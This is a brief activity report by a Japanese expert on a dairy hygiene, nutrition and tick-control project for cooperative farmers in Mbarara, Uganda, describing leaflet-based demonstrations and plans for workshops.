Activity Report

My name is Masahiko Anzai. I am a third on-site expert of this project and going to work in Mbarara until September 2019. I worked in Uganda from May 2014 to October 2016 as JOCV ( Japan Overseas Cooperation Volunteer ), so I got used to living here soon.

This project has three main themes. 1, Milking hygiene 2, Nutrition & Reproduction management 3, Prevention of ticks and tick-borne diseases. We were able to grasp the present situation of each sections of diary in Mbarara from the results of baseline survey so far. Therefor we made some leaflets which is called intervention package to improve the present situation and producing safe milk （Leaflets）。

Explanation of necessary equipment of this intervention packages

At present I and local supporting staff present demonstrations along these leaflets for 30 cooperative farmers of this project, because farmers who participated in project workshop before had some opinions such as they want
to see the actual processes of it on their site. This intervention will be conducted until December 2018. Local extension officers eventually will present these demonstration and this would be continued by local people even after the end of this project.

Explanation of how to use disinfectant towel and post-dipping of teat

We are planning to hold workshop or seminar in milk collection center to disseminate the information to other farmers as future activities.

I often hear some opinions from farmers when I visit there. “ We are often given some things and taught about difficult technique and knowledge from foreigners or NGO, but we cannot sustain and apply them. we need follow up more.”

Therefore, I think I will take lots of opinion from local people as soon as possible and do my best in this project so that that won’t happen.
